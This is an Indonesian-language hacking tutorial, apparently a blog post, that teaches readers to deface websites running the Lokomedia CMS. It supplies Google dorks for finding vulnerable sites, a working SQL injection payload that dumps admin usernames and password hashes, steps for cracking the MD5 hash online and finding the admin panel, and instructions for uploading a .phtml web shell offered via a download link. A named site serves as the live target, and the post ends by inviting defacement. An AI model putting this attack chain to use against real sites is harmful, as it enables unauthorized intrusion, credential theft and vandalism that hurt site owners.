hai fans , ketemu lg bersama saya si ganteng and tamvans awkoawkoakw :v
Oh iya ane mau share cara deface lg nih , tapi dengan cara yg berbeda :v , kali ini ane share cara deface dengan cara SQL LOKOMEDIA :v
Oh iya sebelom ane ksih tau tutornya , ane mau nanya neh :v , Klean smua malem jumat ini ngapain aja >:( , jangan jangan ........... ahh sudahlah lupakan :v ... Yuk disimak caranya :V
Bahan Bahan :
#Dork : inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html [ Kembangin lagi dorknya biar dpet web yg vuln, oh iya ane ksih tau nih klo mau kembangin dork ini tinggal ubah aja ANGKA nya ]
#Bagi yg blom pnya shell format .phtml bisa di download disini ~> https://uploadfiles.io/72upn
password shellnya : akugans
#Exploit :
'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
#Admin finder online/admin finder tools jg boleh :v
#oh ea , saran ane sih sambil dengerin musik Marshmello :v
Caranya :
1. seperti biasanya kita buka google trus masukin dork yg diatas , trus pilih salah satu websitenya tapi cari yg ada halaman statisnya :v, lihat gambar :v
2. nah ane udh dapet targetnya nih, kan di url target tertulis
http://sewakursimejamurah.com/statis-1-profil.html
ada statis-1-profil.html kan? nih liat gambar
3. nah pas sesudah angka sisipkan exploitnya maka akan jadi seperti ini
http://sewakursimejamurah.com/statis-1'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
[ sesudah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v
4. kan udh ente ctrl+u tuh , nah sekarang liat disitu tertulis admin,09....... nah itu dia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA
5. ok kita kan udh tau nih ya kan username sama passwordnya yg msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yg di samping kanan tulisan admin, nah copy angkanya saatnya kita hash online passwordnya di https://hashkiller.co.uk/md5-decrypter.aspx ,,, nah dan jreng jreng ane udh berhasil nih gan dapet password aslinya :v,Untuk liat password aslinya nnti akan muncul di sebelah kanan, nih liat gambar
6. nah kan udh dapet password aslinya tuh, sekarang kita cari dimana admin loginnya, bisa pke adminfinder online, bisa juga pke admin finder tools :v, bisa juga pke cara manual nih ane ajarin , caranya
*misalkan web ini : http://sewakursimejamurah.com
*Kita tambahkan /robots.txt di akhir urlnya maka akan jadi gini http://sewakursimejamurah.com/robots.txt
nah pas kita tambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yg tulisan disallow nya, karna itu disallownya /adminw36 berarti halaman admin login ada di http://sewakursimejamurah.com/adminw36 ] , paham kan? liat gambar :v
7. sekarang kita coba login dengan username sama password yg udh kita hash tadi , halaman admin login ada disini http://sewakursimejamurah.com/adminw36 klo udh berhasil msk maka tampilan nya akan seperti ini
8. Daaaaan Boom!!! kita udh berhasil masuk sebagai admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanem shellnya gomna? iya kalem ane jelasin :v
OK , dimana tempat buat tanem shellnya? lihat tulisan [ Media Trus Pilih Download ] kan? nah disitu kita tanem shellnya , lihat gambar :v
9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane gausah tanem lg ea :v , skrg kita klik tulisan [ Tambah Download ] , Nah trus pilih deh shell lu , tampilannya kya gini :v
10. INGET BRO BACA BAIK BAIK : upload shellnya harus format .phtml
jadi yg blom punya udh ane sediain tuh diatas link buat download shellnya :v
11. ok klo shell udh berhasil ke upload sekarang kita cari akses shellnya/ bisa dibilang dimana shell lu berada caranya? ok gini caranya kita cukup tambahkan /files/namashelllu . jadi kaya gini http://sewakursimejamurah.com/files/shell.phtml [ Nah yg Shell.phtml itu lu ubah aja sesuaikan dengan nama shell yg udh lu upload tadi gan :v ... nah dan jreng jreng ane udh ketemu nih akses shellnya lihat gambar :v
hehe terserah deh mau diapain :v , Tebas index jg gapapa :v
TAPI INGAT klo mau tebas index , diusahakan di backup indexnya kasihan adminnya bikin script indexnya lag :'(
Kalo mau jadi bajingan jadi sekalian jangan tanggung tanggung , tapi kalo mau jadi bajingan tapi ragu-ragu mending jangan
h3h3 udh itu aja ya :v, ok cukup sekian tutor dari ane, ane akan share share cara deface yg lainnya , see you next time guys :v
Oh iya klo ada link atau gambar yg ga muncul atau ada yg ga ngerti bisa langsung kontak ane di fb nih linknya https://facebook.com/sokmanteb
Sekian Wassalamualaikum Wr Wb :)